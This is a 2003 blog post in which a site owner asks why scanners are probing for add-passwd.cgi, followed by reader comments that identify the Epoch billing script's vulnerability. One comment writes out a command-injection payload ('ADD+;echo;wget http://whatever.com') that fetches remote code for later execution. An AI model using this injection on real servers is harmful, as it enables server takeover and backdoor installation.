December 27, 2003
What's Going On?

Yesterday's referral logs list nine different referrals coming (supposedly) from various permutations of this address:

drweevil.org//pages/add-passwd.cgi

Most of the permutations just changed the directory name, from /pages to (e.g.) /cgibin or /cgi-bin or /cgi-bin/epoch, but one changed the file name to es-passwd.cgi. Four of the referrals were repeated, for a total of 13. Fortunately, there doesn't seem to be any such file as add-passwd.cgi or es-passwd.cgi in my version of Movable Type, and most of the directories tried do not exist on my site, either.

Checking my logs, I find that the 13 referrals came from 11 different IP addresses, most of them apparently in Portugal or Queensland, though my WhoIs skills are rudimentary. If anyone is wondering, here are the IP numbers, which I have of course banned:

164.100.190.246 (twice)
213.141.31.146
211.75.231.21 (twice)
203.115.204.133
203.200.28.158
202.188.63.130
217.33.69.131
200.223.149.170
148.223.251.99
203.113.34.239
194.126.30.138

So what exactly is going on? Given the name add-passwd.cgi, it looks as if someone is trying to gain posting privileges on my site. There is certainly no legitimate reason why any stranger -- or any friend or relative, for that matter -- should even think of trying to add a password to my site without my permission. I'm left with a number of questions:

  1. What exactly are these evil persons trying to do? Shut my website down entirely? Take it over completely and post things I would not wish to post? (Something like that seems to have happened to the egregious 'Barney Gumble', though I gather that was because he gave up his BlogSpot site, which allowed someone else to claim it.) Or is there some sort of partial takeover that would be useful to someone in some way, and worth going to a lot of trouble to achieve? (Trolls can already put crap in my comments, though it doesn't last long.)
  2. Why would anyone want to do this? If they're trying to shut me down, it's presumably because they disapprove of what I post, most likely for political reasons. If they're trying to take over my site, it may not be personal: they may just be looking for any site that could be hijacked to sell groinopaphic pictures or Viagra or Jihad or whatever, or just to display some pathetic geek's web-graffiti.
  3. How vulnerable am I? Could this have worked if they had been a little luckier? Could it work in the future? Has it already worked, and I don't know it yet? (It occurs to me that they may be somehow attempting to insert an add-passwd.cgi file in my directories rather than find one that's already there. If so, they have not yet succeeded: I checked all my directories.)
  4. What can I do to prevent this kind of attack (or reconaissance mission, if that's what it is) in the future?

Please place your suggestions in the comments.

Posted by Dr. Weevil at December 27, 2003 01:43 PM
Comments

Found this mention on a chat board at amateurmasters.com:

Did anyone get this about the Epoch script and the possible CCbill script being vunerable?

We have found a particular problem with the add-passwd.cgi script from Epoch, which appears to have a pretty severe security problem. The locations of this script are below.

/cgi-bin/add-passwd.cgi

It is through this script, located at /cgi-bin/add-passwd.cgi, that someone was able to issue commands on the server just as if they were user "cfox" logged in at a telnet prompt. They used this access to compile a tool used for committing denial of service attacks and when the mood struck them to do so activated one.

The prime targets for the attackers appears to be Epoch's add-passwd.cgi and CCBill's whereami.cgi scripts. New versions of the paysite password administration code needs to be installed ASAP or sooner; we will need to disable the old scripts pretty soon because they are actively being used to attack others and are having an impact our network.

Please contact Epoch ASAP and get the most current version of the add-passwd.cgi script, and anything else Epoch provides that may need updating to end the security issue.

****Anyone have any problems with this?

Hmmm
Hugs
Mina

Me again. Epoch runs a business that appears to deal with handling business transactions through Web sites. I can't find any information at their Web site (www.epochsystems.com), but their site map shows they offer billing support to several European countries, including Portugal.

Posted by: Bill Peschel on December 28, 2003 11:53 PM

Thanks! It looks like I'm safe, since I don't have any Epoch software, or any software to collect money over the web except my PayPal button, which I gather is not affected.

Posted by: Dr. Weevil on December 29, 2003 12:01 AM

You say "a pretty severe security problem"
mmmmm :)
just for your info this script is a very severe security problem !!!!!!!!!!!
now al tel ya why
with a simple http debugger you can use post data and download to the server eny file u want
imagen that!
viruses backdoors or what ever u want and its so simple u just have to type in the post data
ADD+;echo;(cmd here)
it can be
ADD+;echo;wget http://whatever.com
and then he can use eny command he want to open the file he downloaded and exec it as well
:\ meny sites use this script :\
Bo0oM^

Posted by: oren on January 6, 2004 01:41 PM

I'm not sure if you care or not, but here:

1) Those IP addresses mean nothing. People aren't idiots, they use hundreds and hundreds of anonymous proxies. These proxies are rated on a 1-5 scale in terms of anonymity. You will never get any information on who actually used the proxy even you contact the proxy owner because no logs are kept

2) This is being done by an automated scanner someone uses. It's basically blindly searching for an exploit for whatever reason to gain access to certain things on your site. In general these attacks are only launched against porn sites.

Posted by: random person on July 18, 2004 10:44 PM